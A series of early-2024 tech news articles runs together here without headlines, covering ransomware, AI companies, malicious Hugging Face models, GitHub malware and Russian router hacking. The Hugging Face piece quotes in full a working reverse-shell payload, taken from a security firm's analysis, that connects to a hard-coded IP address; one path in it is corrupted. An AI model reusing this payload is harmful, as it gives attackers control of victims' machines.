On Tuesday, OpenAI published a blog post titled “OpenAI and Elon Musk” in response to a lawsuit Musk filed last week. The ChatGPT maker shared several archived emails from Musk that suggest he once supported a pivot away from open source practices in the company’s quest to develop artificial general intelligence (AGI). The selected emails also imply that the “open” in “OpenAI” means that the ultimate result of its research into AGI should be open to everyone but not necessarily “open source” along the way.
In one telling exchange from January 2016 shared by the company, OpenAI Chief Scientist Illya Sutskever wrote, “As we get closer to building AI, it will make sense to start being less open. The Open in openAI means that everyone should benefit from the fruits of AI after its built, but it’s totally OK to not share the science (even though sharing everything is definitely the right strategy in the short and possibly medium term for recruitment purposes).”
The ransomware group responsible for hamstringing the prescription drug market for two weeks has suddenly gone dark, just days after receiving a $22 million payment and standing accused of scamming an affiliate out of its share of the loot.
The events involve AlphV, a ransomware group also known as BlackCat. Two weeks ago, it took down Change Healthcare, the biggest US health care payment processor, leaving pharmacies, health care providers, and patients scrambling to fill prescriptions for medicines. On Friday, the bitcoin ledger shows, the group received nearly $22 million in cryptocurrency, stoking suspicions the deposit was payment by Change Healthcare in exchange for AlphV decrypting its data and promising to delete it.
Representatives of Optum, the parent company, declined to say if the company has paid AlphV.
Honor among thieves
On Sunday, two days following the payment, a party claiming to be an AlphV affiliate said in an online crime forum that the nearly $22 million payment was tied to the Change Healthcare breach. The party went on to say that AlphV members had cheated the affiliate out of the agreed-upon cut of the payment. In response, the affiliate said it hadn’t deleted the Change Healthcare data it had obtained.
Enlarge/ A message left in a crime forum from a party claiming to be an AlphV affiliate. The post claims AlphV scammed the affiliate out of its cut.
vxunderground
On Tuesday—four days after the bitcoin payment was made and two days after the affiliate claimed to have been cheated out of its cut—AlphV’s public dark web site started displaying a message saying it had been seized by the FBI as part of an international law enforcement action.
Enlarge/ The AlphV extortion site as it appeared on Tuesday.
The UK’s National Crime Agency, one of the agencies the seizure message said was involved in the takedown, said the agency played no part in any such action. The FBI, meanwhile, declined to comment. The NCA denial, as well as evidence the seizure notice was copied from a different site and pasted into the AlphV one, has led multiple researchers to conclude the ransomware group staged the takedown and took the entire $22 million payment for itself.
“Since people continue to fall for the ALPHV/BlackCat cover up: ALPHV/BlackCat did not get seized,” Fabian Wosar, head of ransomware research at security firm Emsisoft, wrote on social media. “They are exit scamming their affiliates. It is blatantly obvious when you check the source code of the new takedown notice.”
Hackers backed by the North Korean government gained a major win when Microsoft left a Windows zero-day unpatched for six months after learning it was under active exploitation.
Even after Microsoft patched the vulnerability last month, the company made no mention that the North Korean threat group Lazarus had been using the vulnerability since at least August to install a stealthy rootkit on vulnerable computers. The vulnerability provided an easy and stealthy means for malware that had already gained administrative system rights to interact with the Windows kernel. Lazarus used the vulnerability for just that. Even so, Microsoft has long said that such admin-to-kernel elevations don’t represent the crossing of a security boundary, a possible explanation for the time Microsoft took to fix the vulnerability.
A rootkit “holy grail”
“When it comes to Windows security, there is a thin line between admin and kernel,” Jan Vojtěšek, a researcher with security firm Avast, explained last week. “Microsoft’s security servicing criteria have long asserted that ‘[a]dministrator-to-kernel is not a security boundary,’ meaning that Microsoft reserves the right to patch admin-to-kernel vulnerabilities at its own discretion. As a result, the Windows security model does not guarantee that it will prevent an admin-level attacker from directly accessing the kernel.”
The Microsoft policy proved to be a boon to Lazarus in installing “FudModule,” a custom rootkit that Avast said was exceptionally stealthy and advanced. Rootkits are pieces of malware that have the ability to hide their files, processes, and other inner workings from the operating system itself and at the same time control the deepest levels of the operating system. To work, they must first gain administrative privileges—a major accomplishment for any malware infecting a modern OS. Then, they must clear yet another hurdle: directly interacting with the kernel, the innermost recess of an OS reserved for the most sensitive functions.
In years past, Lazarus and other threat groups have reached this last threshold mainly by exploiting third-party system drivers, which by definition already have kernel access. To work with supported versions of Windows, third-party drivers must first be digitally signed by Microsoft to certify that they are trustworthy and meet security requirements. In the event Lazarus or another threat actor has already cleared the admin hurdle and has identified a vulnerability in an approved driver, they can install it and exploit the vulnerability to gain access to the Windows kernel. This technique—known as BYOVD (bring your own vulnerable driver)—comes at a cost, however, because it provides ample opportunity for defenders to detect an attack in progress.
The vulnerability Lazarus exploited, tracked as CVE-2024-21338, offered considerably more stealth than BYOVD because it exploited appid.sys, a driver enabling the Windows AppLocker service, which comes preinstalled in the Microsoft OS. Avast said such vulnerabilities represent the “holy grail,” as compared to BYOVD.
In August, Avast researchers sent Microsoft a description of the zero-day, along with proof-of-concept code that demonstrated what it did when exploited. Microsoft didn’t patch the vulnerability until last month. Even then, the disclosure of the active exploitation of CVE-2024-21338 and details of the Lazarus rootkit came not from Microsoft in February but from Avast 15 days later. A day later, Microsoft updated its patch bulletin to note the exploitation.
On Monday, Anthropic released Claude 3, a family of three AI language models similar to those that power ChatGPT. Anthropic claims the models set new industry benchmarks across a range of cognitive tasks, even approaching “near-human” capability in some cases. It’s available now through Anthropic’s website, with the most powerful model being subscription-only. It’s also available via API for developers.
Claude 3’s three models represent increasing complexity and parameter count: Claude 3 Haiku, Claude 3 Sonnet, and Claude 3 Opus. Sonnet powers the Claude.ai chatbot now for free with an email sign-in. But as mentioned above, Opus is only available through Anthropic’s web chat interface if you pay $20 a month for “Claude Pro,” a subscription service offered through the Anthropic website. All three feature a 200,000-token context window. (The context window is the number of tokens—fragments of a word—that an AI language model can process at once.)
We covered the launch of Claude in March 2023 and Claude 2 in July that same year. Each time, Anthropic fell slightly behind OpenAI’s best models in capability while surpassing them in terms of context window length. With Claude 3, Anthropic has perhaps finally caught up with OpenAI’s released models in terms of performance, although there is no consensus among experts yet—and the presentation of AI benchmarks is notoriously prone to cherry-picking.
Enlarge/ A Claude 3 benchmark chart provided by Anthropic.
Claude 3 reportedly demonstrates advanced performance across various cognitive tasks, including reasoning, expert knowledge, mathematics, and language fluency. (Despite the lack of consensus over whether large language models “know” or “reason,” the AI research community commonly uses those terms.) The company claims that the Opus model, the most capable of the three, exhibits “near-human levels of comprehension and fluency on complex tasks.”
That’s quite a heady claim and deserves to be parsed more carefully. It’s probably true that Opus is “near-human” on some specific benchmarks, but that doesn’t mean that Opus is a general intelligence like a human (consider that pocket calculators are superhuman at math). So, it’s a purposely eye-catching claim that can be watered down with qualifications.
According to Anthropic, Claude 3 Opus beats GPT-4 on 10 AI benchmarks, including MMLU (undergraduate level knowledge), GSM8K (grade school math), HumanEval (coding), and the colorfully named HellaSwag (common knowledge). Several of the wins are very narrow, such as 86.8 percent for Opus vs. 86.4 percent on a five-shot trial of MMLU, and some gaps are big, such as 84.9 percent on HumanEval over GPT-4’s 67.0 percent. But what that might mean, exactly, to you as a customer is difficult to say.
“As always, LLM benchmarks should be treated with a little bit of suspicion,” says AI researcher Simon Willison, who spoke with Ars about Claude 3. “How well a model performs on benchmarks doesn’t tell you much about how the model ‘feels’ to use. But this is still a huge deal—no other model has beaten GPT-4 on a range of widely used benchmarks like this.”
Nine days after a Russian-speaking ransomware syndicate took down the biggest US health care payment processor, pharmacies, health care providers, and patients were still scrambling to fill prescriptions for medicines, many of which are lifesaving.
On Thursday, UnitedHealth Group accused a notorious ransomware gang known both as AlphV and Black Cat of hacking its subsidiary Optum. Optum provides a nationwide network called Change Healthcare, which allows health care providers to manage customer payments and insurance claims. With no easy way for pharmacies to calculate what costs were covered by insurance companies, many had to turn to alternative services or offline methods.
The most serious incident of its kind
Optum first disclosed on February 21 that its services were down as a result of a “cyber security issue.” Its service has been hamstrung ever since. Shortly before this post went live on Ars, Optum said it had restored Change Healthcare services.
“Working with technology and business partners, we have successfully completed testing with vendors and multiple retail pharmacy partners for the impacted transaction types,” an update said. “As a result, we have enabled this service for all customers effective 1 pm CT, Friday, March 1, 2024.”
AlphV is one of many syndicates that operates under a ransomware-as-a-service model, meaning affiliates do the actual hacking of victims and then use the AlphV ransomware and infrastructure to encrypt files and negotiate a ransom. The parties then share the proceeds.
In December, the FBI and its equivalent in partner countries announced they had seized much of the AlphV infrastructure in a move that was intended to disrupt the group. AlphV promptly asserted it had unseized its site, leading to a tug-of-war between law enforcement and the group. The crippling of Change Healthcare is a clear sign that AlphV continues to pose a threat to critical parts of the US infrastructure.
“The cyberattack against Change Healthcare that began on Feb. 21 is the most serious incident of its kind leveled against a US health care organization,” said Rick Pollack, president and CEO of the American Hospital Association. Citing Change Healthcare data, Pollack said that the service processes 15 billion transactions involving eligibility verifications, pharmacy operations, and claims transmittals and payments. “All of these have been disrupted to varying degrees over the past several days and the full impact is still not known.”
Optum estimated that as of Monday, more than 90 percent of roughly 70,000 pharmacies in the US had changed how they processed electronic claims as a result of the outage. The company went on to say that only a small number of patients have been unable to get their prescriptions filled.
The scale and length of the Change Healthcare outage underscore the devastating effects ransomware has on critical infrastructure. Three years ago, members affiliated with a different ransomware group known as Darkside caused a five-day outage of Colonial Pipeline, which delivered roughly 45 percent of the East Coast’s petroleum products, including gasoline, diesel fuel, and jet fuel. The interruption caused fuel shortages that sent airlines, consumers, and filling stations scrambling.
Numerous ransomware groups have also taken down entire hospital networks in outages that in some cases have threatened patient care.
AlphV has been a key contributor to the ransomware menace. The FBI said in December the group had collected more than $300 million in ransoms. One of the better-known victims of AlphV ransomware was Caesars Entertainment and casinos owned by MGM, which brought operations in many Las Vegas casinos to a halt. A group of mostly teenagers is suspected of orchestrating that breach.
Code uploaded to AI developer platform Hugging Face covertly installed backdoors and other types of malware on end-user machines, researchers from security firm JFrog said Thursday in a report that’s a likely harbinger of what’s to come.
In all, JFrog researchers said, they found roughly 100 submissions that performed hidden and unwanted actions when they were downloaded and loaded onto an end-user device. Most of the flagged machine learning models—all of which went undetected by Hugging Face—appeared to be benign proofs of concept uploaded by researchers or curious users. JFrog researchers said in an email that 10 of them were “truly malicious” in that they performed actions that actually compromised the users’ security when loaded.
Full control of user devices
One model drew particular concern because it opened a reverse shell that gave a remote device on the Internet full control of the end user’s device. When JFrog researchers loaded the model into a lab machine, the submission indeed loaded a reverse shell but took no further action.
That, the IP address of the remote device, and the existence of identical shells connecting elsewhere raised the possibility that the submission was also the work of researchers. An exploit that opens a device to such tampering, however, is a major breach of researcher ethics and demonstrates that, just like code submitted to GitHub and other developer platforms, models available on AI sites can pose serious risks if not carefully vetted first.
“The model’s payload grants the attacker a shell on the compromised machine, enabling them to gain full control over victims’ machines through what is commonly referred to as a ‘backdoor,’” JFrog Senior Researcher David Cohen wrote. “This silent infiltration could potentially grant access to critical internal systems and pave the way for large-scale data breaches or even corporate espionage, impacting not just individual users but potentially entire organizations across the globe, all while leaving victims utterly unaware of their compromised state.”
A lab machine set up as a honeypot to observe what happened when the model was loaded.
JFrog
Enlarge/ Secrets and other bait data the honeypot used to attract the threat actor.
JFrog
How baller432 did it
Like the other nine truly malicious models, the one discussed here used pickle, a format that has long been recognized as inherently risky. Pickles is commonly used in Python to convert objects and classes in human-readable code into a byte stream so that it can be saved to disk or shared over a network. This process, known as serialization, presents hackers with the opportunity of sneaking malicious code into the flow.
The model that spawned the reverse shell, submitted by a party with the username baller432, was able to evade Hugging Face’s malware scanner by using pickle’s “__reduce__” method to execute arbitrary code after loading the model file.
JFrog’s Cohen explained the process in much more technically detailed language:
In loading PyTorch models with transformers, a common approach involves utilizing the torch.load() function, which deserializes the model from a file. Particularly when dealing with PyTorch models trained with Hugging Face’s Transformers library, this method is often employed to load the model along with its architecture, weights, and any associated configurations. Transformers provide a comprehensive framework for natural language processing tasks, facilitating the creation and deployment of sophisticated models. In the context of the repository “baller423/goober2,” it appears that the malicious payload was injected into the PyTorch model file using the __reduce__ method of the pickle module. This method, as demonstrated in the provided reference, enables attackers to insert arbitrary Python code into the deserialization process, potentially leading to malicious behavior when the model is loaded.
Upon analysis of the PyTorch file using the fickling tool, we successfully extracted the following payload:
RHOST = "210.117.212.93" RPORT = 4242 from sys import platform if platform != 'win32': import threading import socket import pty import os def connect_and_spawn_shell(): s = socket.socket() s.connect((RHOST, RPORT)) [os.dup2(s.fileno(), fd) for fd in (0, 1, 2)] pty.spawn("https://arstechnica.com/bin/sh") threading.Thread(target=connect_and_spawn_shell).start() else: import os import socket import subprocess import threading import sys def send_to_process(s, p): while True: p.stdin.write(s.recv(1024).decode()) p.stdin.flush() def receive_from_process(s, p): while True: s.send(p.stdout.read(1).encode()) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) while True: try: s.connect((RHOST, RPORT)) break except: pass p = subprocess.Popen(["powershell.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell=True, text=True) threading.Thread(target=send_to_process, args=[s, p], daemon=True).start() threading.Thread(target=receive_from_process, args=[s, p], daemon=True).start() p.wait()
Hugging Face has since removed the model and the others flagged by JFrog.
Enlarge/ The HP Envy 6020e is one of the printers available for rent.
HP launched a subscription service today that rents people a printer, allots them a specific amount of printed pages, and sends them ink for a monthly fee. HP is framing its service as a way to simplify printing for families and small businesses, but the deal also comes with monitoring and a years-long commitment.
Prices range from $6.99 per month for a plan that includes an HP Envy printer (the current model is the 6020e) and 20 printed pages. The priciest plan includes an HP OfficeJet Pro rental and 700 printed pages for $35.99 per month.
HP says it will provide subscribers with ink deliveries when they’re running low and 24/7 support via phone or chat (although it’s dubious how much you want to rely on HP support). Support doesn’t include on or offsite repairs or part replacements. The subscription’s terms of service (TOS) note that the service doesn’t cover damage or failure caused by, unsurprisingly, “use of non-HP media supplies and other products” or if you use your printer more than what your plan calls for.
HP is watching
HP calls this an All-In-Plan; if you subscribe, the tech company will be all in on your printing activities.
One of the most perturbing aspects of the subscription plan is that it requires subscribers to keep their printers connected to the Internet. In general, some users avoid connecting their printer to the Internet because it’s the type of device that functions fine without web access.
A web connection can also concern users about security or HP-issued firmware updates that make printers stop functioning with non-HP ink.
But HP enforces an Internet connection by having its TOS also state that HP may disrupt the service—and continue to charge you for it—if your printer’s not online.
HP says it enforces a constant connection so that the company can monitor things that make sense for the subscription, like ink cartridge statuses, page count, and “to prevent unauthorized use of Your account.” However, HP will also remotely monitor the type of documents (for example, a PDF or JPEG) printed, the devices and software used to initiate the print job, “peripheral devices,” and any other “metrics” that HP thinks are related to the subscription and decides to add to its remote monitoring.
The All-In-Plan privacy policy also says that HP may “transfer information about you to advertising partners” so that they can “recognize your devices,” perform targeted advertising, and, potentially, “combine information about you with information from other companies in data sharing cooperatives” that HP participates in. The policy says that users can opt out of sharing personal data.
The All-In-Plan TOS reads:
Subject to the terms of this Agreement, You hereby grant to HP a non-exclusive, worldwide, royalty-free right to use, copy, store, transmit, modify, create derivative works of and display Your non-personal data for its business purposes.
Wikipedia has downgraded tech website CNET’s reliability rating following extensive discussions among its editors regarding the impact of AI-generated content on the site’s trustworthiness, as noted in a detailed report from Futurism. The decision reflects concerns over the reliability of articles found on the tech news outlet after it began publishing AI-generated stories in 2022.
Around November 2022, CNET began publishing articles written by an AI model under the byline “CNET Money Staff.” In January 2023, Futurism brought widespread attention to the issue and discovered that the articles were full of plagiarism and mistakes. (Around that time, we covered plans to do similar automated publishing at BuzzFeed.) After the revelation, CNET management paused the experiment, but the reputational damage had already been done.
Wikipedia maintains a page called “Reliable sources/Perennial sources” that includes a chart featuring news publications and their reliability ratings as viewed from Wikipedia’s perspective. Shortly after the CNET news broke in January 2023, Wikipedia editors began a discussion thread on the Reliable Sources project page about the publication.
“CNET, usually regarded as an ordinary tech RS [reliable source], has started experimentally running AI-generated articles, which are riddled with errors,” wrote a Wikipedia editor named David Gerard. “So far the experiment is not going down well, as it shouldn’t. I haven’t found any yet, but any of these articles that make it into a Wikipedia article need to be removed.”
After other editors agreed in the discussion, they began the process of downgrading CNET’s reliability rating.
As of this writing, Wikipedia’s Perennial Sources list currently features three entries for CNET broken into three time periods: (1) before October 2020, when Wikipedia considered CNET a “generally reliable” source; (2) between October 2020 and October 2022, where Wikipedia notes that the site was acquired by Red Ventures in October 2020, “leading to a deterioration in editorial standards” and saying there is no consensus about reliability; and (3) between November 2022 and present, where Wikipedia currently considers CNET “generally unreliable” after the site began using an AI tool “to rapidly generate articles riddled with factual inaccuracies and affiliate links.”
Enlarge/ A screenshot of a chart featuring CNET’s reliability ratings, as found on Wikipedia’s “Perennial Sources” page.
Futurism reports that the issue with CNET’s AI-generated content also sparked a broader debate within the Wikipedia community about the reliability of sources owned by Red Ventures, such as Bankrate and CreditCards.com. Those sites published AI-generated content around the same period of time as CNET. The editors also criticized Red Ventures for not being forthcoming about where and how AI was being implemented, further eroding trust in the company’s publications. This lack of transparency was a key factor in the decision to downgrade CNET’s reliability rating.
In response to the downgrade and the controversies surrounding AI-generated content, CNET issued a statement that claims that the site maintains high editorial standards.
“CNET is the world’s largest provider of unbiased tech-focused news and advice,” a CNET spokesperson said in a statement to Futurism. “We have been trusted for nearly 30 years because of our rigorous editorial and product review standards. It is important to clarify that CNET is not actively using AI to create new content. While we have no specific plans to restart, any future initiatives would follow our public AI policy.”
This article was updated on March 1, 2024 at 9: 30am to reflect fixes in the date ranges for CNET on the Perennial Sources page.
GitHub is struggling to contain an ongoing attack that’s flooding the site with millions of code repositories. These repositories contain obfuscated malware that steals passwords and cryptocurrency from developer devices, researchers said.
The malicious repositories are clones of legitimate ones, making them hard to distinguish to the casual eye. An unknown party has automated a process that forks legitimate repositories, meaning the source code is copied so developers can use it in an independent project that builds on the original one. The result is millions of forks with names identical to the original one that add a payload that’s wrapped under seven layers of obfuscation. To make matters worse, some people, unaware of the malice of these imitators, are forking the forks, which adds to the flood.
Whack-a-mole
“Most of the forked repos are quickly removed by GitHub, which identifies the automation,” Matan Giladi and Gil David, researchers at security firm Apiiro, wrote Wednesday. “However, the automation detection seems to miss many repos, and the ones that were uploaded manually survive. Because the whole attack chain seems to be mostly automated on a large scale, the 1% that survive still amount to thousands of malicious repos.”
Given the constant churn of new repos being uploaded and GitHub’s removal, it’s hard to estimate precisely how many of each there are. The researchers said the number of repos uploaded or forked before GitHub removes them is likely in the millions. They said the attack “impacts more than 100,000 GitHub repositories.”
GitHub officials didn’t dispute Apiiro’s estimates and didn’t answer other questions sent by email. Instead, they issued the following statement:
GitHub hosts over 100M developers building across over 420M repositories, and is committed to providing a safe and secure platform for developers. We have teams dedicated to detecting, analyzing, and removing content and accounts that violate our Acceptable Use Policies. We employ manual reviews and at-scale detections that use machine learning and constantly evolve and adapt to adversarial tactics. We also encourage customers and community members to report abuse and spam.
Supply-chain attacks that target users of developer platforms have existed since at least 2016, when a college student uploaded custom scripts to RubyGems, PyPi, and NPM. The scripts bore names similar to widely used legitimate packages but otherwise had no connection to them. A phone-home feature in the student’s scripts showed that the imposter code was executed more than 45,000 times on more than 17,000 separate domains, and more than half the time his code was given all-powerful administrative rights. Two of the affected domains ended in .mil, an indication that people inside the US military had run his script. This form of supply-chain attack is often referred to as typosquatting, because it relies on users making small errors when choosing the name of a package they want to use.
In 2021, a researcher used a similar technique to successfully execute counterfeit code on networks belonging to Apple, Microsoft, Tesla, and dozens of other companies. The technique—known as a dependency confusion or namespace confusion attack—started by placing malicious code packages in an official public repository and giving them the same name as dependency packages Apple and the other targeted companies use in their products. Automated scripts inside the package managers used by the companies then automatically downloaded and installed the counterfeit dependency code.
The technique observed by Apiiro is known as repo confusion.
“Similar to dependency confusion attacks, malicious actors get their target to download their malicious version instead of the real one,” Wednesday’s post explained. “But dependency confusion attacks take advantage of how package managers work, while repo confusion attacks simply rely on humans to mistakenly pick the malicious version over the real one, sometimes employing social engineering techniques as well.”
On Monday, Microsoft announced plans to offer AI models from Mistral through its Azure cloud computing platform, which came in conjunction with a 15 million euro non-equity investment in the French firm, which is often seen as a European rival to OpenAI. Since then, the investment deal has faced scrutiny from European Union regulators.
Microsoft’s deal with Mistral, known for its large language models akin to OpenAI’s GPT-4 (which powers the subscription versions of ChatGPT), marks a notable expansion of its AI portfolio at a time when its well-known investment in California-based OpenAI has raised regulatory eyebrows. The new deal with Mistral drew particular attention from regulators because Microsoft’s investment could convert into equity (partial ownership of Mistral as a company) during Mistral’s next funding round.
The development has intensified ongoing investigations into Microsoft’s practices, particularly related to the tech giant’s dominance in the cloud computing sector. According to Reuters, EU lawmakers have voiced concerns that Mistral’s recent lobbying for looser AI regulations might have been influenced by its relationship with Microsoft. These apprehensions are compounded by the French government’s denial of prior knowledge of the deal, despite earlier lobbying for more lenient AI laws in Europe. The situation underscores the complex interplay between national interests, corporate influence, and regulatory oversight in the rapidly evolving AI landscape.
Avoiding American influence
The EU’s reaction to the Microsoft-Mistral deal reflects broader tensions over the role of Big Tech companies in shaping the future of AI and their potential to stifle competition. Calls for a thorough investigation into Microsoft and Mistral’s partnership have been echoed across the continent, according to Reuters, with some lawmakers accusing the firms of attempting to undermine European legislative efforts aimed at ensuring a fair and competitive digital market.
The controversy also touches on the broader debate about “European champions” in the tech industry. France, along with Germany and Italy, had advocated for regulatory exemptions to protect European startups. However, the Microsoft-Mistral deal has led some, like MEP Kim van Sparrentak, to question the motives behind these exemptions, suggesting they might have inadvertently favored American Big Tech interests.
“That story seems to have been a front for American-influenced Big Tech lobby,” said Sparrentak, as quoted by Reuters. Sparrentak has been a key architect of the EU’s AI Act, which has not yet been passed. “The Act almost collapsed under the guise of no rules for ‘European champions,’ and now look. European regulators have been played.”
MEP Alexandra Geese also expressed concerns over the concentration of money and power resulting from such partnerships, calling for an investigation. Max von Thun, Europe director at the Open Markets Institute, emphasized the urgency of investigating the partnership, criticizing Mistral’s reported attempts to influence the AI Act.
Also on Monday, amid the partnership news, Mistral announced Mistral Large, a new large language model (LLM) that Mistral says “ranks directly after GPT-4 based on standard benchmarks.” Mistral has previously released several open-weights AI models that have made news for their capabilities, but Mistral Large will be a closed model only available to customers through an API.
Enlarge/ A view of a Wendy’s store on August 9, 2023, in Nanuet, New York.
American fast food chain Wendy’s is planning to test dynamic pricing and AI menu features in 2025, reports Nation’s Restaurant News and Food & Wine. This means that prices for food items will automatically change throughout the day depending on demand, similar to “surge pricing” in rideshare apps like Uber and Lyft. The initiative was disclosed by Kirk Tanner, the CEO and president of Wendy’s, in a recent discussion with analysts.
According to Tanner, Wendy’s plans to invest approximately $20 million to install digital menu boards capable of displaying these real-time variable prices across all of its company-operated locations in the United States. An additional $10 million is earmarked over two years to enhance Wendy’s global system, which aims to improve order accuracy and upsell other menu items.
In conversation with Food & Wine, a spokesperson for Wendy’s confirmed the company’s commitment to this pricing strategy, describing it as part of a broader effort to grow its digital business. “Beginning as early as 2025, we will begin testing a variety of enhanced features on these digital menuboards like dynamic pricing, different offerings in certain parts of the day, AI-enabled menu changes and suggestive selling based on factors such as weather,” they said. “Dynamic pricing can allow Wendy’s to be competitive and flexible with pricing, motivate customers to visit and provide them with the food they love at a great value. We will test a number of features that we think will provide an enhanced customer and crew experience.”
Enlarge/ A Wendy’s drive-through menu as seen in 2023 during the FreshAI rollout.
Wendy’s is not the first business to explore dynamic pricing—it’s a common practice in several industries, including hospitality, retail, airline travel, and the aforementioned rideshare apps. Its application in the fast-food sector is largely untested, and it’s uncertain how customers will react. However, a few other restaurants have tested the method and have experienced favorable results. “For us, it was all about consumer reaction,” Faizan Khan, a Dog Haus franchise owner, told Food & Wine. “The concern was if you’re going to raise prices, you’re going to sell less product, and it turns out that really wasn’t the case.”
The price-change plans are the latest in a series of moves designed to modernize Wendy’s business using technology—and increase profits. In 2023, Wendy’s began testing FreshAI, a system designed to take orders with a conversational AI bot, potentially replacing human workers in the process. In his discussion, Tanner also discussed “AI-enabled menu changes” and “suggestive selling” without elaboration, though the Wendy’s spokesperson remarked that suggestive selling may automatically emphasize some items based dynamically on local weather conditions, such as trying to sell cold drinks on a hot day.
If Wendy’s goes through with its plan, it’s unclear how the dynamic pricing will affect food delivery apps such as Uber Eats or Doordash, or even the Wendy’s mobile app. Presumably, third-party apps will need a way to link into Wendy’s dynamic price system (Wendy’s API anyone?).
In other news, Wendy’s is also testing “Saucy Nuggets” in a small number of restaurants near the chain’s Ohio headquarters. Refreshingly, they have nothing to do with AI.
The FBI and partners from 10 other countries are urging owners of Ubiquiti EdgeRouters to check their gear for signs they’ve been hacked and are being used to conceal ongoing malicious operations by Russian state hackers.
The Ubiquiti EdgeRouters make an ideal hideout for hackers. The inexpensive gear, used in homes and small offices, runs a version of Linux that can host malware that surreptitiously runs behind the scenes. The hackers then use the routers to conduct their malicious activities. Rather than using infrastructure and IP addresses that are known to be hostile, the connections come from benign-appearing devices hosted by addresses with trustworthy reputations, allowing them to receive a green light from security defenses.
Unfettered access
“In summary, with root access to compromised Ubiquiti EdgeRouters, APT28 actors have unfettered access to Linux-based operating systems to install tooling and to obfuscate their identity while conducting malicious campaigns,” FBI officials wrote in an advisory Tuesday.
APT28—one of the names used to track a group backed by the Russian General Staff Main Intelligence Directorate known as GRU—has been doing that for at least the past four years, the FBI has alleged. Earlier this month, the FBI revealed that it had quietly removed Russian malware from routers in US homes and businesses. The operation, which received prior court authorization, went on to add firewall rules that would prevent APT28—also tracked under names including Sofacy Group, Forest Blizzard, Pawn Storm, Fancy Bear, and Sednit—from being able to regain control of the devices.
On Tuesday, FBI officials noted that the operation only removed the malware used by APT28 and temporarily blocked the group using its infrastructure from reinfecting them. The move did nothing to patch any vulnerabilities in the routers or to remove weak or default credentials hackers could exploit to use the devices once again to host their malware surreptitiously.
“The US Department of Justice, including the FBI, and international partners recently disrupted a GRU botnet consisting of such routers,” they warned. “However, owners of relevant devices should take the remedial actions described below to ensure the long-term success of the disruption effort and to identify and remediate any similar compromises.”
Those actions include:
Perform a hardware factory reset to remove all malicious files
Upgrade to the latest firmware version
Change any default usernames and passwords
Implement firewall rules to restrict outside access to remote management services.
Tuesday’s advisory said that APT28 has been using the infected routers since at least 2022 to facilitate covert operations against governments, militaries, and organizations around the world, including in the Czech Republic, Italy, Lithuania, Jordan, Montenegro, Poland, Slovakia, Turkey, Ukraine, the United Arab Emirates, and the US. Besides government bodies, industries targeted include aerospace and defense, education, energy and utilities, hospitality, manufacturing, oil and gas, retail, technology, and transportation. APT28 has also targeted individuals in Ukraine.
The Russian hackers gained control of devices after they were already infected with Moobot, which is botnet malware used by financially motivated threat actors not affiliated with the GRU. These threat actors installed Moobot after first exploiting publicly known default administrator credentials that hadn’t been removed from the devices by the people who owned them. APT28 then used the Moobot malware to install custom scripts and malware that turned the botnet into a global cyber espionage platform.